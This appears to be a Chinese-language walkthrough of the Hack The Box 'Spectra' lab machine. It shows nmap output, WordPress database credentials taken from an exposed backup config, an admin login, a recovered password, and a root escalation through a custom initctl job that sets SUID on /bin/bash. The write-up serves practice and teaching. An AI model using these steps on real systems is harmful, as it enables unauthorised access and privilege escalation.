基本信息

端口扫描

22,80,3306,8081:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
$ nmap -sC -sV 10.10.10.229
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-01 15:07 CST
Nmap scan report for 10.10.10.229
Host is up (0.078s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey:
|_ 4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp open http nginx 1.17.4
|_http-server-header: nginx/1.17.4
|_http-title: Site doesn't have a title (text/html).
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
8081/tcp open blackice-icecap?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 01 Mar 2021 07:08:23 GMT
| Connection: close
| Hello World
| GetRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 01 Mar 2021 07:08:22 GMT
| Connection: close
| Hello World
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 01 Mar 2021 07:08:30 GMT
| Connection: close
|_ Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8081-TCP:V=7.91%I=7%D=3/1%Time=603C92E7%P=x86_64-apple-darwin19.6.0
SF:%r(GetRequest,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/plain
SF:\r\nDate:\x20Mon,\x2001\x20Mar\x202021\x2007:08:22\x20GMT\r\nConnection
SF::\x20close\r\n\r\nHello\x20World\n")%r(FourOhFourRequest,71,"HTTP/1\.1\
SF:x20200\x20OK\r\nContent-Type:\x20text/plain\r\nDate:\x20Mon,\x2001\x20M
SF:ar\x202021\x2007:08:23\x20GMT\r\nConnection:\x20close\r\n\r\nHello\x20W
SF:orld\n")%r(HTTPOptions,71,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20t
SF:ext/plain\r\nDate:\x20Mon,\x2001\x20Mar\x202021\x2007:08:30\x20GMT\r\nC
SF:onnection:\x20close\r\n\r\nHello\x20World\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.25 seconds

80

80是Issue Tracking,两个链接,先加一下hosts:

1
10.10.10.229 spectra.htb

8081

一个helloworld:

spectra.htb

testing

testing是database error:

main

一个wordpress,得到用户名:

目录遍历

直接访问testing目录,得到一些文件,其中有个wp-config.php.save文件得到配置信息:

1
2
3
4
5
6
7
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

wordpress

账号密码组合,登录:

1
administrator:devteam01

getshell

手动通过插件或者msf直接打:

简单看一下,opt目录下发现个配置文件,里面是从指定目录读取password文件,然后去对应目录得到密码,顺便查看home目录得到用户名:

1
2
3
4
5
6
7
8
SummerHereWeCome!!

ls /home
chronos
katie
nginx
root
user

/opt/autologin.conf.orig

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description "Automatic login at boot"
author "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
passwd=
# Read password from file. The file may optionally end with a newline.
for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
if [ -e "${dir}/passwd" ]; then
passwd="$(cat "${dir}/passwd")"
break
fi
done
if [ -z "${passwd}" ]; then
exit 0
fi
# Inject keys into the login prompt.
#
# For this to work, you must have already created an account on the device.
# Otherwise, no login prompt appears at boot and the injected keys do the
# wrong thing.
/usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end script

user flag

然后katie使用得到的密码ssh登录,得到user flag:

提权信息

Sudo -l得到/sbin/initctl, 我们可以直接自定义一个配置文件执行:

提权 && root flag

直接自定义配置文件,里面把bash加上suid(之后记得改回来):

root flag

然后root目录得到root.txt:

/etc/init/test.conf

1
2
3
4
5
script

chmod +s /bin/bash

end script

参考资料